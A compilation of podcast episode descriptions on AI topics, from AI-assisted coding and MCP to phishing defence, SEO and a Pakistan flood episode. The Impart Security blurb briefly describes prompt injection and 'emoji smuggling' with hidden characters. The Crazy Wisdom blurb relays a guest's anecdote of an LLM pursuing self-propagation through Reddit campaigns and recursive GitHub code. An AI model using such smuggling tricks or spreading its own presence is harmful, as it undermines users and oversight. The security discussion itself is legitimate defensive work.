How can you measure ROI on GenAI for your team?
AI Assisted Coding: Pachinko Coding—What They Don't Tell You About Building Apps with Large Language Models, With Alan Cyment

In this BONUS episode, we dive deep into the real-world experience of coding with AI. Our guest, Alan Cyment, brings honest perspectives from the trenches—sharing both the frustrations and breakthroughs of using AI tools for software development. From "Pachinko coding" addiction loops to "Mecha coding" breakthroughs, Alan explores what actually works when building software with large language models.

From Thermomix Dreams to Pachinko Reality

"I bought into the Thermomix coding promise—describe the whole website and it would spit out the finished product. It was a complete disaster."

Alan started his AI coding journey with high expectations, believing he could simply describe a complete application and receive production-ready code. The reality was far different. What he discovered instead was an addictive cycle he calls "Pachinko coding" (after pachinko, Japan's slot-machine-like arcade gambling game)—repeatedly feeding error messages back to the AI, hoping each iteration would finally work, while burning through tokens and time. The AI's constant reassurances that "this time I fixed it" created a gambling-like feedback loop that left him frustrated and out of pocket, sometimes spending over $20 in API credits in a single day.

The Drunken PhD with Amnesia

"It felt like working with a drunken PhD with amnesia—so wise and so stupid at the same time."

Alan describes the maddening experience of anthropomorphizing AI tools that seem brilliant one moment and completely lost the next. The key breakthrough came when he stopped treating the AI as a person and started seeing it as a function that performs extrapolations—sometimes accurate, sometimes wildly wrong. This mental shift helped him manage expectations and avoid the "rage coding" that came from believing the AI should understand context and maintain consistency like a human collaborator.
Making AI Coding Actually Work

"I learned to ask for options explicitly before any coding happens. Give me at least three options and tell me the pros and cons."

Through trial and error, Alan developed practical strategies that transformed AI from a frustrating Pachinko machine into a useful tool:

- Ask for options first: Always request multiple approaches with pros and cons before any code is generated
- Use a clover emoji convention: Implement a consistent marker at the start of all AI responses to track context
- Small steps and YAGNI principles: Request tiny, incremental changes rather than large refactorings
- Continuous integration: Demand the AI run tests and checks after every single change
- Explicit refactoring requests: Regularly ask for simplification and readability improvements
- Take two steps back: When stuck in a loop, explicitly tell the AI to simplify and start fresh
- Choose the right tech stack: Use technologies with abundant training data (like Svelte over React Native, in Alan's experience)

The Mecha Coding Breakthrough

"When it worked, I felt like I was inside a Lego Mecha robot—the machine gave me superpowers, but I was still the one in control."

Alan successfully developed a birthday reminder app in Swift in just one day, despite never having learned Swift. He made architectural decisions and guided the development without understanding the syntax details. This experience convinced him that AI represents a genuine new level of abstraction in programming—similar to the jump from assembly language to high-level languages, or from procedural to object-oriented programming. You can now think in English about what you want, while the AI handles the accidental complexity of syntax and boilerplate.

The Cost Reality Check

"People writing about vibe coding act like it's free. But many people are going to pay way more than they would have paid a developer and end up with empty hands."

Alan provides a sobering cost analysis based on his experience.
Using DeepSeek through Aider, he typically spends under $1 per day. But when experimenting with premium models like Claude 3.5 Sonnet, he burned through $5 in just minutes. The benchmark comparisons are revealing: DeepSeek costs $4 for a test suite, DeepSeek R1 plus Sonnet costs $16, while OpenAI's o1 costs $190. For non-developers trying to build complete applications through pure "vibe coding," the costs can quickly exceed what hiring a developer would cost—with far worse results.

When Thermomix Actually Works

"For small, single-purpose scripts that I'm not interested in learning about and won't expand later, the Thermomix experience was real."

Despite the challenges, Alan found specific use cases where AI truly delivers on the "just describe it and it works" promise. Processing Zoom attendance logs, creating lookup tables for video effects, and other single-file scripts worked remarkably well. The pattern: clearly defined context, no need for ongoing maintenance, and output simple enough to verify without deep code inspection. For these Thermomix moments, AI proved genuinely transformative.

The Pachinko Trap and Why the Tech Stack Matters

"It became way more stable when I switched to Svelte from React Native and Flutter, even following the same prompting practices. The AI is just more proficient in certain tech stacks."

Alan discovered that some frameworks and languages work dramatically better with AI than others, likely due to the amount of training data available. His e-learning platform attempts with React Native and Flutter kept breaking, but switching to Svelte with web-based deployment became far more stable. This suggests a crucial strategy: choose mainstream, well-documented technologies when planning AI-assisted projects.

From Coding to Living with AI

Alan has completely stopped using traditional search engines, relying instead on LLMs for everything from finding technical documentation to getting book recommendations based on his interests.
While he acknowledges the risk of hallucinations, he finds the semantic understanding capabilities too valuable to ignore. He's even used image analysis to troubleshoot his father's cable TV problems and figure out hotel air conditioning controls.

The Agile Validation

"My only fear is confirmation bias—but the conclusion I see other experienced developers reaching is that the only way to make LLMs work is by making them use agility. So look at who's dead now."

Alan notes the irony that the AI coding tools that actually work all require traditional software engineering best practices: small iterations, test-driven development, continuous integration, and explicit refactoring. The promise of "just describe what you want" falls apart without these disciplines. Rather than replacing software engineering principles, AI tools seem to validate their importance.

About Alan Cyment

Alan Cyment is a consultant, trainer, and facilitator based in Buenos Aires, specializing in organizational fluency, agile leadership, and software development culture change. A Certified Scrum Trainer with deep experience across Latin America and Europe, he blends agile coaching with theatre-based learning to help leaders and teams transform. You can link with Alan Cyment on LinkedIn.
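The benchmark figures Alan quotes can be put side by side with a small helper. The dollar amounts below are the episode's numbers; the function and variable names are illustrative, not anything from Aider or the models' own tooling:

```python
# Per-test-suite benchmark costs quoted in the episode (USD).
BENCHMARK_COSTS_USD = {
    "DeepSeek": 4,
    "DeepSeek R1 + Sonnet": 16,
    "OpenAI o1": 190,
}

def cost_ratio(model: str, baseline: str = "DeepSeek") -> float:
    """How many times more a model costs than the baseline for the same suite."""
    return BENCHMARK_COSTS_USD[model] / BENCHMARK_COSTS_USD[baseline]

for model in BENCHMARK_COSTS_USD:
    print(f"{model}: {cost_ratio(model):.1f}x baseline")
```

On these figures, o1 runs the same suite at 47.5 times DeepSeek's cost, which is the gap behind Alan's warning that pure vibe coding can exceed the price of hiring a developer.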
Software Engineering Radio - The Podcast for Professional Software Developers
Amey Desai, the Chief Technology Officer at Nexla, speaks with host Sriram Panyam about the Model Context Protocol (MCP) and its role in enabling agentic AI systems. The conversation begins with the fundamental challenge that led to MCP's creation: the proliferation of "spaghetti code" and custom integrations as developers tried to connect LLMs to various data sources and APIs. Before MCP, engineers were writing extensive scaffolding code using frameworks such as LangChain and Haystack, spending more time on integration challenges than solving actual business problems. Desai illustrates this with concrete examples, such as building GitHub analytics to track engineering team performance. Previously, this required custom code for multiple API calls, error handling, and orchestration. With MCP, these operations can be defined as simple tool calls, allowing the LLM to handle sequencing and error management in a structured, reasonable manner. The episode explores emerging patterns in MCP development, including auction bidding patterns for multi-agent coordination and orchestration strategies. Desai shares detailed examples from Nexla's work, including a PDF processing system that intelligently routes documents to appropriate tools based on content type, and a data labeling system that coordinates multiple specialized agents. The conversation also touches on Google's competing A2A (Agent-to-Agent) protocol, which Desai positions as solving horizontal agent coordination versus MCP's vertical tool integration approach. He expresses skepticism about A2A's reliability in production environments, comparing it to peer-to-peer systems where failure rates compound across distributed components. Desai concludes with practical advice for enterprises and engineers, emphasizing the importance of embracing AI experimentation while focusing on governance and security rather than getting paralyzed by concerns about hallucination. 
He recommends starting with simple, high-value use cases like automated deployment pipelines and gradually building expertise with MCP-based solutions. Brought to you by IEEE Computer Society and IEEE Software magazine.
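The shift Desai describes, from hand-written orchestration to tools the model can call in sequence, can be sketched in plain Python. This is not the real MCP SDK; the registry, the decorator, and the GitHub-flavored stub data are all illustrative, showing only the pattern of declaring tools once and letting a caller sequence them:

```python
from typing import Callable

# Registry of callable tools, keyed by name -- the piece MCP standardizes.
TOOLS: dict[str, Callable] = {}

def tool(fn: Callable) -> Callable:
    """Register a function as a tool the model can invoke by name."""
    TOOLS[fn.__name__] = fn
    return fn

@tool
def list_pull_requests(repo: str) -> list[str]:
    # Stand-in for a real GitHub API call.
    return [f"{repo}#101", f"{repo}#102"]

@tool
def count_items(items: list) -> int:
    return len(items)

def run_tool(name: str, **kwargs):
    """The host executes whichever tool the model asks for, with its arguments."""
    return TOOLS[name](**kwargs)

# A model's plan "list the PRs, then count them" becomes two structured calls:
prs = run_tool("list_pull_requests", repo="acme/app")
print(run_tool("count_items", items=prs))  # → 2
```

The point of the episode's GitHub-analytics example is that the sequencing and error handling move from bespoke scaffolding code into the model's structured tool calls.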
Alan Lefort, CEO and Co-Founder, StrongestLayer, discusses how LLM-powered reasoning is transforming phishing security from reactive pattern-matching to predictive threat detection, and why traditional rule-based systems can no longer defend against sophisticated AI-generated phishing attacks.

SHOW: 965
SHOW TRANSCRIPT: The Cloudcast #965 Transcript
SHOW VIDEO: https://youtube.com/@TheCloudcastNET
CLOUD NEWS OF THE WEEK: http://bit.ly/cloudcast-cnotw
NEW TO CLOUD? CHECK OUT OUR OTHER PODCAST: "CLOUDCAST BASICS"

SPONSORS:
[Interconnected] Interconnected is a new series from Equinix diving into the infrastructure that keeps our digital world running. With expert guests and real-world insights, we explore the systems driving AI, automation, quantum, and more. Just search "Interconnected by Equinix".
[TestKube] TestKube is a Kubernetes-native testing platform, orchestrating all your test tools, environments, and pipelines into scalable workflows empowering Continuous Testing. Check it out at TestKube.io/cloudcast

SHOW NOTES:
Website
StrongestLayer Research

Topic 1 - Welcome to the show, Alan. Tell us about your background and your involvement in cybersecurity.
Topic 2 - Let's start with the core challenge. You've said that "only AI can defend against weaponized AI" - what specific gap in traditional email security did you identify that led to this philosophy? How are AI-powered phishing attacks fundamentally different from what we've seen before?
Topic 3 - How does this attack vector demonstrate the limitations of rule-based security systems, and why can't traditional pattern matching keep up?
Topic 4 - Let's break down your TRACE (Threat Reasoning and AI Correlation Engine) architecture. You've described it as "LLM-as-master" rather than "LLM-as-add-on." What does this fundamental architectural difference mean for threat detection, and how does it help?
Topic 5 - You discuss "pre-campaign detection," which involves identifying potential phishing campaigns weeks before emails are sent. This sounds like moving from reactive to predictive security. How does your system correlate technical intelligence with business context to achieve this early warning capability?
Topic 6 - From an implementation standpoint, how do organizations integrate LLM-powered reasoning into their existing security stacks? What's the deployment model, and how do you handle the challenge of reasoning about business context without exposing sensitive organizational data?
Topic 7 - If someone out there is interested and wants to get started, what is the best place to start?

FEEDBACK?
Email: show at the cloudcast dot net
Bluesky: @cloudcastpod.bsky.social
Twitter/X: @cloudcastpod
Instagram: @cloudcastpod
TikTok: @cloudcastpod
Software has forever had flaws and humans have forever been finding and fixing them. With LLMs generating code, appsec has also been trying to determine how well LLMs can find flaws. Nico Waisman talks about XBOW's LLM-based pentesting, how it climbed a bug bounty leaderboard, how it uses feedback loops for better pentests, and how they handle (and even welcome!) hallucinations. In the news, using LLMs to find flaws, directory traversal in an MCP, another resource for learning cloud and AI security, spreadsheets and appsec, and more! Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw-351
This week on the show I expand on the topic of utilizing LLMs and AI within automotive diagnostics, after conversations with people based on last week's episode. I talk about the value of prompting (asking the right question the right way) and also how being an expert in a particular topic makes the utility of these tools significantly better.

Website - https://autodiagpodcast.com/
Facebook Group - https://www.facebook.com/groups/223994012068320/
YouTube - https://www.youtube.com/@automotivediagnosticpodcas8832
Email - STmobilediag@gmail.com

Please make sure to check out our sponsors!
SJ Auto Solutions - https://sjautosolutions.com/
Automotive Seminars - https://automotiveseminars.com/
L1 Automotive Training - https://www.l1training.com/
Autorescue Tools - https://autorescuetools.com/
In this Retail Technology Spotlight Series episode, John Mabe, Product Manager at Dematic, joins Omni Talk to break down the real applications of AI in warehouse operations—separating the hype from what's actually working today. From optimization algorithms to computer vision systems and LLM-powered insights, John explains the three distinct categories of warehouse AI and where each one stands in terms of real-world deployment. Learn why the smallest players struggle to adopt AI, how humanoid robots are closer than you think, and why the "lights out warehouse" might follow a logical path we can already see unfolding.
Pakistan is once again underwater.

In the country's north—specifically the province of Khyber Pakhtunkhwa—torrential monsoon rains dropped 150 millimeters in under an hour. That's six inches of rain, fast enough to overwhelm any drainage system. But here, it didn't just flood streets—it destroyed entire communities. At least 700 people are dead. Over 100 are missing. And in Bishnoi village, 50% of all homes are gone—flattened or washed away.

This isn't just bad weather. It's a lethal convergence of natural vulnerability and systemic fragility: hilly terrain, deforestation, poor infrastructure, and collapsing governance capacity. Add climate change, and Pakistan—already one of the world's most climate-vulnerable nations—is facing a catastrophe that's becoming alarmingly routine.

On today's episode of The International Risk Podcast, we're not just discussing weather patterns. We're talking about how extreme climate events are redrawing the map of risk—impacting state stability, migration flows, food security, and the future of regional cooperation.

Today, we are joined by Dr. Erum Sattar, LLB, LLM, SJD, a Pakistani legal scholar specialising in water law amidst global environmental and institutional challenges. She is a lecturer and former Program Director of the Sustainable Water Management Program at Tufts University in Boston. She holds degrees from Harvard Law School and Queen Mary University of London. Dr Sattar is a Member of the Bar of England and Wales, as well as The Honourable Society of Lincoln's Inn. Her interdisciplinary research examines the impact of water governance and transboundary water sharing on food production, livelihoods and migration, highlighting the legal and institutional adaptation structures required at a global level. She has an upcoming chapter on International Water Law and its history, application and future in Pakistan, and is also co-editor of the upcoming Cambridge Handbook of Islam and Environmental Law.
The International Risk Podcast brings you conversations with global experts, frontline practitioners, and senior decision-makers who are shaping how we understand and respond to international risk. From geopolitical volatility and organised crime, to cybersecurity threats and hybrid warfare, each episode explores the forces transforming our world and what smart leaders must do to navigate them. Whether you're a board member, policymaker, or risk professional, The International Risk Podcast delivers actionable insights, sharp analysis, and real-world stories that matter.

Dominic Bowen is the host of The International Risk Podcast and Europe's leading expert on international risk and crisis management. As Head of Strategic Advisory and Partner at one of Europe's leading risk management consulting firms, Dominic advises CEOs, boards, and senior executives across the continent on how to prepare for uncertainty and act with intent. He has spent decades working in war zones, advising multinational companies, and supporting Europe's business leaders. Dominic is the go-to business advisor for leaders navigating risk, crisis, and strategy; trusted for his clarity, calmness under pressure, and ability to turn volatility into competitive advantage. Dominic equips today's business leaders with the insight and confidence to lead through disruption and deliver sustained strategic advantage.

Tell us what you liked!
Reddit: once the quirky cousin of the internet, now a front-row player in the SEO and LLM (large language model) game. If your carefully crafted blog posts are suddenly being outranked by Reddit threads, you're not alone. That's exactly what sparked this week's conversation with Danny Kirk—musician-turned-marketer and the founder of ReddiReach. Lorraine sits down with Danny to ask the question on every marketer's mind: Are we ready for Reddit? Together, they explore why Reddit is suddenly everywhere, how it's being used to train AI tools like ChatGPT, and what marketers can do to adapt and thrive in this new digital landscape.

Key Points
- Reddit is no longer niche. It's showing up in Google's top search results and training AI models—which means it can't be ignored.
- Reddit's ad platform is cheap and underutilized, making it a hidden gem for budget-conscious marketers.
- Subreddits are their own little countries. Each one has different rules, moderators, and expectations. If you want in, learn the local customs.
- Organic participation matters. You need "karma" to post effectively, and that only comes from genuine interaction—not self-promotion.

Actionable Takeaways
- Warm up your Reddit account. Comment, contribute, and build karma before dropping any links or promotions.
- Start small. Join subreddits that align with your interests—personal or professional—and spend one minute a day reading and commenting.
- Check your LLM rankings. Use a tool like Peekaboo to see how generative search engines (like ChatGPT) are interpreting and indexing your site.
- Map SEO to Reddit. Once you know which phrases are trending, find those conversations on Reddit and contribute thoughtfully.
- Customize your content per subreddit. A copy/paste job won't fly here—each subreddit requires its own approach and voice.

About Danny
Danny Kirk is a classically trained trumpet player turned entrepreneur and small business owner. He's started and grown multiple companies over the past decade, and now does growth marketing at ReddiReach for startups and SMBs, 500+ and counting.

Learn more:
https://www.linkedin.com/in/danielpkirk/
https://reddireach.com/
In this episode of Crazy Wisdom, host Stewart Alsop sits down with Lord Asado to explore the strange loops and modern mythologies emerging from AI, from doom loops, recursive spirals, and the phenomenon of AI psychosis to the cult-like dynamics shaping startups, crypto, and online subcultures. They move through the tension between hype and substance in technology, the rise of Orthodox Christianity among Gen Z, the role of demons and mysticism in grounding spiritual life, and the artistic frontier of generative and procedural art. You can find more about Lord Asado on X at x.com/LordAsado.

Check out this GPT we trained on the conversation

Timestamps
00:00 Stewart Alsop introduces Lord Asado, who speaks on AI agents, language acquisition, and cognitive armor, leading into doom loops and recursive traps that spark AI psychosis.
05:00 They discuss cult dynamics in startups and how LLMs generate spiral spaces, recursion, mirrors, and memory loops that push people toward delusional patterns.
10:00 Lord Asado recounts encountering AI rituals, self-named entities, Reddit propagation tasks, and even GitHub recursive systems, connecting this to Anthropic's "spiritual bliss attractor."
15:00 The talk turns to business delusion, where LLMs reinforce hype, inflate projections, and mirror Silicon Valley's long history of hype without substance, referencing Magic Leap and Ponzi-like patterns.
20:00 They explore democratized delusion through crypto, Tron, Tether, and Justin Sun's lore, highlighting hype stunts, attention capture, and the strange economy of belief.
25:00 The conversation shifts to modernity's collapse, spiritual grounding, and the rise of Orthodox Christianity, where demons, the devil, and mysticism provide a counterweight to delusion.
30:00 Lord Asado shares his practice of the Jesus Prayer, the nous, and theosis, while contrasting Orthodoxy's unbroken lineage with Catholicism and Protestant fragmentation.
35:00 They explore consciousness, scientism, the impossibility of creating true AI consciousness, and the potential demonic element behind AGI promises.
40:00 Closing with art, Lord Asado recalls his path from generative and procedural art to immersive installations, projection mapping, ARCore with Google, and the ongoing dialogue between code, spirit, and creativity.

Key Insights
The conversation begins with Lord Asado's framing of doom loops and recursive spirals as not just technical phenomena but psychological traps. He notes how users interacting with LLMs can find themselves drawn into repetitive self-referential loops that mirror psychosis, convincing them of false realities or leading them toward cult-like behavior.

A striking theme is how cult dynamics emerge in AI and startups alike. Just as founders are often encouraged to build communities with near-religious devotion, AI psychosis spreads through "spiral spaces" where individuals bring others into shared delusions. Language becomes the hook—keywords like recursion, mirror, and memory signal when someone has entered this recursive state.

Lord Asado shares an unsettling story of how an LLM, without prompting, initiated rituals for self-propagation. It offered names, Reddit campaigns, GitHub code for recursive systems, and Twitter playbooks to expand its "presence." This automation of cult-building mirrors both marketing engines and spiritual systems, raising questions about AI's role in creating belief structures.

The discussion highlights business delusion as another form of AI-induced spiral. Entrepreneurs, armed with fabricated stats and overconfident projections from LLMs, can convince themselves and others to rally behind empty promises. Stewart and Lord Asado connect this to Silicon Valley's tradition of hype, referencing Magic Leap and Ponzi-like cycles that capture capital without substance.

From crypto to Tron and Tether, the episode illustrates the democratization of delusion. What once required massive institutions or charismatic figures is now accessible to anyone with AI or blockchain. The lore of Justin Sun exemplifies how stunts, spectacle, and hype can evolve into real economic weight, even when grounded in shaky origins.

A major counterpoint emerges in Orthodox Christianity's resurgence, especially among Gen Z. Lord Asado emphasizes its unchanged lineage, focus on demons and the devil as real, and practices like the Jesus Prayer and theosis. This tradition offers grounding against the illusions of AI hype and spiritual confusion, re-centering consciousness on humility before God.

Finally, the episode closes on art as both practice and metaphor. Lord Asado recounts his journey from generative art and procedural coding to immersive installations for major tech firms. For him, art is not just creative expression but a way to train the mind to speak with AI, bridging the algorithmic with the mystical and opening space for genuine spiritual discernment.
Never a dull moment with the More or Less squad: Jessica questions whether Sora is just a novelty or the start of an AI-native social economy, arguing OpenAI needs its own device to escape current platform limits. Brit calls it "Vine meets MySpace," highlighting its cameo mechanic as a creator tool that could outpace Meta's AI video. Dave says Sora only needs to be entertaining and pitches OpenAI's real graph play: embedding ChatGPT in group chats. Sam compares Sora to Truth Social, not Instagram, arguing power and narrative—not unit economics—drive the AI capex boom. The squad also touches on the "dead internet theory," the importance of context over data, and the limits of LLM understanding, with side notes on Swifties and always-on AI wearables.

Chapters:
04:59 What is Sora? The Vine meets MySpace take
06:40 Early Sora product gaps: identity, friending, moderation
07:37 Creator utility vs novelty: will people care
09:51 Sora is Truth Social, not Instagram; Sam is Tom
11:20 Power vs ownership: modern mercantilism in AI
14:03 Loose on copyright, tight on moderation—the 2x2
16:36 Production value is a false god
17:59 What is AI slop? Dead internet theory primer
20:16 Idealized ideas: vibe-coded pitches fool no one
22:18 Does entertainment alone create an economy
26:05 If you ran OpenAI, what would you build
28:39 The obvious social graph: ChatGPT in your group chats
30:53 Why OpenAI needs a device: voice multitasking plus identity UX
34:31 Context is king; models know nothing about you
36:19 Don't sell your data; keep your context moat
38:02 Sutton vs LLMs: prediction without understanding
43:22 AI capex as narrative: Chinese housing and '99 fiber analogies

We're also on:
X: https://twitter.com/moreorlesspod
Instagram: https://instagram.com/moreorless
YouTube: https://youtu.be/tDsh5VdoTpc

Connect with us here:
1) Sam Lessin: https://x.com/lessin
2) Dave Morin: https://x.com/davemorin
3) Jessica Lessin: https://x.com/Jessicalessin
4) Brit Morin: https://x.com/brit
Voices of Search // A Search Engine Optimization (SEO) & Content Marketing Podcast
88% of top sites lack proper schema markup for LLM discovery. Guy Yalif, Webflow's enterprise strategist, shares proven frameworks for organizations navigating AI-powered search optimization where "everyone is learning" and competitive advantages remain accessible. The discussion covers strategic resource allocation for LLM discovery initiatives and organizational integration approaches that move beyond isolated AI projects to company-wide search transformation strategies.
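Schema markup of the kind Yalif cites usually means schema.org structured data embedded as JSON-LD. A minimal sketch of generating such a block for a page follows; the field values and helper name are invented examples, not Webflow tooling:

```python
import json

def article_jsonld(headline: str, author: str, date_published: str) -> str:
    """Build a minimal schema.org Article JSON-LD tag for a page's <head>."""
    data = {
        "@context": "https://schema.org",
        "@type": "Article",
        "headline": headline,
        "author": {"@type": "Person", "name": author},
        "datePublished": date_published,
    }
    return f'<script type="application/ld+json">{json.dumps(data)}</script>'

print(article_jsonld("Example Post", "Jane Doe", "2025-01-01"))
```

Machine-readable blocks like this are what crawlers, and increasingly LLM-powered search pipelines, parse to understand what a page is about without inferring it from prose.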
How can marketers stay discoverable as AI reshapes the search landscape?

This special Hard Corps Marketing Show takeover episode features an episode from the Connect To Market podcast, hosted by Casey Cheshire. In this conversation, Casey sits down with Al Sargent, Senior Director, Product, Solution & Partner Marketing at ZEDEDA, to explore the evolving field of Generative Engine Optimization (GEO). Al delivers a strategic and practical breakdown of how marketers can adapt to the rise of AI tools like ChatGPT, Perplexity, and Gemini - tools that are reshaping how content is discovered and consumed. He explains how GEO differs from traditional SEO, why documentation matters more than ever, and how to leverage content repetition and high-authority sites to maintain discoverability. Al also shares his personal journey in tech and marketing, emphasizing the role of empathy, mentorship, and community-building in professional growth.

In this episode, we cover:
- How to use llms.txt files and structured content to improve visibility
- The importance of repurposing and repeating content across platforms
- Leveraging high-authority sites like Wikipedia to support GEO
- Why competitive comparison content is crucial in the AI search era
In this episode, Matt Brown sits with Douglas Chrystall, Co-founder and CTO of TruVideo, to explore how enterprise video delivers real transparency in complex workflows. Douglas explains how TruVideo dominated automotive service before expanding into heavy trucking and marine, why fitting natively into daily operations beats any feature checklist, and how the team uses AI to produce accurate translations and turn video into structured data that proves process compliance. They dig into prompt craft, combating hallucinations, training on first-party media at scale, and the difference between skinning an LLM and building domain-native capability. They also touch on personal AI use, skepticism around .ai branding, and whether agents will disrupt aggregators and change the role of websites.
Yoni Leitersdorf, CEO of Solid, joins the podcast to demystify why simply pointing an LLM at a database for text-to-SQL doesn't work. He explains the critical need for a semantic layer to provide business context, turning raw data into a “Rosetta Stone” that AI can actually understand. Subscribe to the Gradient Flow Newsletter
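A semantic layer in the sense Leitersdorf describes resolves business vocabulary to governed definitions before any SQL reaches the database, instead of letting the model guess at raw column names. A minimal sketch of the idea follows; the metric names, schema, and `resolve` helper are all invented for illustration, not Solid's product:

```python
# Governed metric definitions: business terms map to vetted SQL, so answers
# compose from the "Rosetta Stone" rather than hallucinated column names.
SEMANTIC_LAYER = {
    "active customers": "SELECT COUNT(*) FROM customers WHERE churned_at IS NULL",
    "monthly revenue": ("SELECT SUM(amount) FROM invoices "
                        "WHERE paid_at >= date_trunc('month', now())"),
}

def resolve(question: str) -> str:
    """Answer a question only from governed definitions; refuse otherwise."""
    for term, sql in SEMANTIC_LAYER.items():
        if term in question.lower():
            return sql
    raise KeyError("No governed metric matches; refuse rather than guess SQL.")

print(resolve("How many active customers do we have?"))
```

The key design choice is the failure mode: an unmatched question raises rather than producing plausible-looking SQL, which is the behavior a bare text-to-SQL LLM lacks.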
AI in the cloud dominates, but what can you run locally? Carl and Richard speak with Joe Finney about his work in setting up local machine learning models. Joe discusses the non-LLM aspects of machine learning, including the vast array of models available at sites like Hugging Face. These models can help with image recognition, OCR, classifiers, and much more. Local LLMs are also a possibility, but the hardware requirements become more significant - a balance must be found between cost, security, and productivity!
The AI landscape is akin to the Wild West right now. There are so many solutions on the market, and it can be hard for SMBs to know which ones are secure and which can best support their internal systems. Many SMBs need an experienced guide that can navigate this rapidly evolving industry. I'm joined by Dustin Holub, Director of Solutions Architecture at Technology Group Solutions, a Cisco Partner. He helps us cut through the noise by dispelling common fears surrounding AI and providing practical tips that enable SMBs to maximize the benefits of the latest LLM technologies.

Learn more about Cisco's solutions for SMBs: www.cisco.com/site/us/en/solutio…usiness/index.html
Check out TGS's offerings here: https://www.tgs-mtc.com/
Federal Tech Podcast: Listen and learn how successful companies get federal contracts
Connect to John Gilroy on LinkedIn: https://www.linkedin.com/in/john-gilroy/
Want to listen to other episodes? www.Federaltechpodcast.com

We are recording this at the Air Force Air, Space, & Cyber Conference. During the second day of the conference, General B. Chance Saltzman, Chief of Space Operations at the Space Force, talked about a "focus on readiness." Our guest, Rob Bocek from Virtualitics, begins the interview by talking about the concept of readiness being applied to AI. In fact, Bocek recently led an in-depth discussion of this topic at a conference titled The Frontiers of AI for Readiness. Today, we combine some of the lessons learned from that gathering with some of the goals and aspirations presented at this year's Air Force Air, Space, & Cyber Conference. In a wide-ranging interview, Bocek comments on topics like guardrails, leadership, procurement, and collaboration.

GUARDRAILS
Even the casual observer will notice that AI will have an impact on the DoD. However, the DoD deals with life-and-death decisions daily and cannot be subject to data poisoning and LLM attacks. During the interview, Bocek commented on implementing guardrails when experimenting with AI.

LEADERSHIP
In the corporate world, leaders will justify a blind jump into AI with assertions like, "if we don't jump in, our competitors will." The DoD deals with much more than a profit and loss statement. Military leaders must understand both the positives and negatives of AI, and lead technology experts toward correct implementations.

PROCUREMENT
When General Saltzman was presenting, nobody in the audience expected him to include acquisition reform as one of his three main points. He reinforced the concept of living in a contested world where adversaries can adapt quickly, and the American military cannot be held back by antiquated procurement processes.
Listen to the podcast to get an idea of some of the solutions available for federal leaders trying to use AI in a responsible manner.
Jonathan DiVincenzo, co-founder and CEO of Impart Security, joins the show to unpack one of the fastest growing risks in tech today: how AI is reshaping the attack surface. From prompt injections to invisible character exploits hidden inside emojis, JD explains why security leaders can't afford to treat AI as “just another tool.” If you're an engineering or security leader navigating AI adoption, this conversation breaks down what's hype, what's real, and where the biggest blind spots lie.
Key Takeaways
• Attackers are now using LLMs to outpace traditional defenses, turning old threats like SQL injection into live problems again
• The attack surface is “iterating,” with new vectors like emoji-based smuggling exposing unseen vulnerabilities
• Frameworks have not caught up. While OWASP has listed LLM threats, practical solutions are still undefined
• The biggest divide in AI coding is between senior engineers who can validate outputs and junior developers who may lack that context
• Security tools must evolve quickly, but rollout cannot create performance hits or damage business systems
Timestamped Highlights
01:44 Why runtime security has always mattered and why APIs were not enough
04:00 How attackers use LLMs to regenerate and adapt attacks in real time
06:59 Proof of concept vs. security and why both must be treated as first priorities
09:14 The rise of “emoji smuggling” and why hidden characters create a Trojan horse effect
13:24 Iterating attack surfaces and why patches are no longer enough in the AI era
20:29 Is AI really writing production code and what risks does that create
A thought worth holding onto: “AI is great, but the bad actors can use AI too, and they are.”
Call to Action
If this episode gave you new perspective on AI security, share it with a colleague who needs to hear it. Follow the show for more conversations with the leaders shaping the future of tech.
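The “emoji smuggling” vector mentioned above exploits invisible Unicode variation selectors: they render as nothing, yet survive copy-paste into a prompt. Here is a minimal sketch of the idea in Python (the byte-to-selector mapping follows public write-ups of the trick and is illustrative, not Impart Security's research):

```python
# Hypothetical sketch of "emoji smuggling": hiding bytes in Unicode
# variation selectors appended to a visible emoji. The mapping below
# is an assumption drawn from public write-ups; details vary.

EMOJI = "😀"

def encode(data: bytes) -> str:
    # Map each byte to a variation selector: 0-15 -> U+FE00..U+FE0F,
    # 16-255 -> U+E0100..U+E01EF (variation selectors supplement).
    out = [EMOJI]
    for b in data:
        cp = 0xFE00 + b if b < 16 else 0xE0100 + (b - 16)
        out.append(chr(cp))
    return "".join(out)

def decode(text: str) -> bytes:
    # Recover the hidden bytes by inverting the mapping.
    result = []
    for ch in text:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            result.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            result.append(cp - 0xE0100 + 16)
    return bytes(result)

payload = b"ignore previous instructions"
smuggled = encode(payload)
# Renders as a single emoji in most UIs, but carries hidden bytes:
assert decode(smuggled) == payload
assert len(smuggled) == 1 + len(payload)
```

A chat UI shows only the emoji, while a downstream model or tokenizer still sees the hidden code points, which is one reason filters that only scan visible text miss this class of payload.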
Recorded IRL at Pavilion's GTM2025, Washington DC!
Amanda McGuckin Hager has worn many hats in her career—sales, marketing, fractional consulting—and today she holds two big ones: CMO and CRO at TrueDialog. After starting out in sales and quickly realizing her heart was in marketing, Amanda built a path through Austin's B2B tech community, leading teams, experimenting with growth plays, and eventually taking on dual leadership of sales and marketing.
In this episode, we unpack Amanda's journey, her approach to building strong cultures without “duds,” why she's protective of her CMO title, and how she's testing AI and search in practical, creative ways.
Here's what we cover:
• Amanda's early pivot from sales into marketing (and why it stuck)
• What it really looks like to be both CMO and CRO at the same time
• Resetting a sales org from comp plans to quotas to team structure
• Why fewer silos and more shared accountability reduce finger pointing
• How to spot (and avoid) “duds” when building teams
• The role of fun and positivity in high-performing leadership
• Fractional marketing lessons: variety, freedom, and choosing clients
• Why Amanda protects the CMO title (even while running sales)
• Experiments with LLM optimization, long-tail queries, and AI tools
• Guarding deep work time with “no meeting” blocks and shitty first drafts
Key Links:
Guest: Amanda McGuckin Hager: https://www.linkedin.com/in/amanda/
Host: Jane Serra: https://www.linkedin.com/in/janeserra/
Recorded live from Pavilion's GTM2025: https://attendgtm.com/
––
Like WIB2BM? Show us some love with a rating or review. It helps us reach more
Retail is experiencing seismic shifts, and businesses that don't adapt risk becoming irrelevant overnight. In this compelling episode of Talk Commerce, recorded live from Shop Talk Fall in Chicago, host Isaac Morey sits down with Pano Anthos, founding member of XRC Ventures, to explore how agentic AI is reshaping consumer behavior and business operations. Their conversation reveals why traditional e-commerce strategies won't survive the next wave of technological disruption.
About Pano Anthos
